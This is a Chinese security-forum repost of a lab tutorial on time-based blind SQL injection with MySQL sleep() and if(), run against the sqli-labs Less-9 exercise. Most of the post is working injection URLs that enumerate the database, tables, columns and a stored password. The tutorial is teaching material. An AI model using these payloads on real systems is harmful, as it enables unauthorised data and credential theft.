安全矩阵

 找回密码
 立即注册
搜索
查看: 2231|回复: 0

通过sleep和if实现延时注入

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-5-16 21:55:27 | 显示全部楼层 |阅读模式
原文链接:通过sleep和if实现延时注入


生活不止眼前的苟且,还有房费、饭费、水电费。。。
---- 网易云热评

一、常用函数

1、sleep(5):延时5秒
2、if(a,b,c):a为条件,正确返回b,否则返回c


二、实例测试
1、找到可以注入的payload,服务器反映5秒才有相应

http://192.168.139.129/sqli/Less-9/?id=1' and sleep(5) --+


2、获取数据库长度,如果数据库名的长度等于8停留5秒

http://192.168.139.129/sqli/Less-9/?id=1' and sleep(if((length(database())=8),5,0)) --+
3、获取数据库名称的每个字母,如果判断正确停留5秒,最后知道数据库名字为"security"

http://192.168.139.129/sqli/Less-9/?id=1' and sleep(if((mid(database(),1,1)='s'),5,0)) --+
http://192.168.139.129/sqli/Less-9/?id=1' and sleep(if((mid(database(),2,1)='e'),5,0)) --+4、获取数据库中的表名,最后得出一个表为users

http://192.168.139.129/sqli/Less-9/?id=1' and sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1)='u'),5,0)) --+
http://192.168.139.129/sqli/Less-9/?id=1' and sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 3,1),2,1)='s'),5,0)) --+5、获取users表中的字段,最后得出一个password字段

http://192.168.139.129/sqli/Less-9/?id=1' and sleep(if((mid((select column_name from information_schema.columns where table_name='users' limit 13,1),1,1)='p'),5,0)) --+
http://192.168.139.129/sqli/Less-9/?id=1' and sleep(if((mid((select column_name from information_schema.columns where table_name='users' limit 13,1),2,1)='a'),5,0)) --+6、获取password字段内容,最终获取一个名为admin的内容

http://192.168.139.129/sqli/Less-9/?id=1' and sleep(if((mid((select password from users limit 7,1),1,1)='a' ),5,0)) --+
http://192.168.139.129/sqli/Less-9/?id=1' and sleep(if((mid((select password from users limit 7,1),2,1)='d' ),5,0)) --+

禁止非法,后果自负
欢迎关注公众号:web安全工具库
欢迎关注视频号:之乎者也吧







回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 04:53 , Processed in 0.014447 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表